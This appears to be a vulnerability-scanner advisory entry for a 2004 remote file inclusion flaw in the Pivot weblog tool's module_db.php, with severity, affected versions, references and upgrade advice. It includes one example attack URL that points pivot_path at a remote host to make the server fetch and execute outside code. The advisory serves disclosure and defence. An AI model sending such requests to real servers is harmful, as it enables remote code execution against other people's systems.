Korean
<< Back
VID 21311
Severity 40
Port 80, ...
Protocol TCP
Class CGI
Detailed Description The Pivot software is vulnerable to a Remote File Include Vulnerability in 'module_db.php' file.
Pivot is an application that is used to create Weblogs without the assistance of a database. Several versions of Pivot contain the vulnerability that can allow a remote attacker to include any file and php code, caused by a failure of the application to properly sanitize user-supplied input before including it as a parameter to a file include function call. By sending a specially-crafted URL request to the module_db.php file using the path variable to specify a malicious file from a remote system as a parameter, a remote attacker could execute arbitrary code on the system with Local System privileges.

http://[target_server]/pivot/modules/module_db.php?pivot_path=http://xxxxxxxxxx/

* References:
http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0398.html

* Platforms Affected:
Pivot Web Log Tool 1.14 prior
Any operating system Any version
Recommendation Upgrade to the latest version of Pivot (1.14.1 or later), available from the Pivot web site at
https://sourceforge.net/project/showfiles.php?group_id=67653&package_id=65955&release_id=245757

As a workaround, apply the unofficial patch for this vulnerability, available from the Full-Disclosure Mailing List posting dated Mon Jun 14 2004 - 15:59:58 CDT at http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0398.html
Related URL (CVE)
Related URL 10553 (SecurityFocus)
Related URL 16418 (ISS)